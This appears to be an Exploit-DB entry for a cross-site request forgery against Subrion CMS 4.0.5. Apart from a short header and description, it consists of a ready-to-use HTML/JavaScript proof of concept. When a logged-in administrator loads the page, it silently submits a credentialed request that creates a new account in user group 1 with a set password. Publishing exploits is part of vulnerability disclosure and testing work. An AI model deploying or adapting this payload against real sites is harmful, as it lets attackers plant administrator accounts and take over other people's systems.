Exploits
GHDB
Papers
Shellcodes
Search EDB
SearchSploit Manual
Submissions
Online Training
Stats
About Us
Search
# Exploit Title: Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin) # Date: 2020-01-05 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://intelliants.com/ # Software Link : https://github.com/intelliants/subrion/releases/tag/v4.0.5 # Software : Subrion CMS # Product Version: v 4.0.5.10 # Vulernability Type : Cross-Site Request Forgery (Add Admin) # Vulenrability : Cross-Site Request Forgery # CVE : N/A # Description : # CSRF vulnerability was discovered in v4.0.5 version of Subrion CMS. # With this vulnerability, authorized users can be added to the system. HTML CSRF PoC : <html> <body> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https:\/\/SERVER\/_core\/admin\/members\/add\/", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------9973334999367242361642875270"); xhr.withCredentials = true; var body = "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"__st\"\r\n" + "\r\n" + "41209a5f43b0d7c8cef0e7ffcd9ce160\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"username\"\r\n" + "\r\n" + "ismailtasdelen\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"fullname\"\r\n" + "\r\n" + "Ismail Tasdelen\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"email\"\r\n" + "\r\n" + "test@mail.com\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"_password\"\r\n" + "\r\n" + "Test1234!\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"_password2\"\r\n" + "\r\n" + "Test1234!\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"usergroup_id\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"website\"\r\n" + "\r\n" + "https://ismailtasdelen.com\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"phone\"\r\n" + "\r\n" + "0000000000000000000\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"biography\"\r\n" + "\r\n" + "NULL\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"facebook\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"twitter\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"gplus\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"linkedin\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"sponsored\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"plan_id\"\r\n" + "\r\n" + "2\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"sponsored_end\"\r\n" + "\r\n" + "2020-02-05 05:18:43\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"featured\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"featured_end\"\r\n" + "\r\n" + "2020-02-05 05:19\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"status\"\r\n" + "\r\n" + "active\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"save\"\r\n" + "\r\n" + "Add\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"goto\"\r\n" + "\r\n" + "list\r\n" + "-----------------------------9973334999367242361642875270--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html>